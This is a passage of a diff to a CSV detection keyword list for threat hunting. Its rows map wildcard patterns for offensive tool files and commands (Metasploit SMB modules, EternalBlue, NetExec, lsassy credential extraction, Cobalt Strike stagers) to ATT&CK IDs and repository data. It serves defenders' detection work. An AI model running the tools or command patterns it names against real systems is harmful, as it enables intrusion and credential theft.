TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SlowLoris*","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. 
It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2172","671","2023-05-05T19:21:29Z","2015-04-26T10:00:33Z" +"*slowloris.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SluiEOP.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*smartbrute *kerberos*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*SmashedPotato.cs*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" "*SmashedPotato.exe*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" -"*smb * -u * -p * * -M bh_owned*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*smb * -u * -p * -M ioxidresolver*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*smb * -u * -p * * -M bh_owned*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*smb * -u * -p * -M ioxidresolver*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*smb.dcsync*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" -"*smb/impacket*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb/relay/ntlm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_doublepulsar_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumshares*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumshares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumusers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumusers_domain.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_eternalblue*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*smb_ms17_010_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_pipename_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*smb_rras_erraticgopher.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_shadow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_shadow.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_stealth.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*smb/impacket*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb/relay/ntlm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_doublepulsar_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumshares*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumshares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_enumusers_domain.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_eternalblue*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb_ms17_010_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
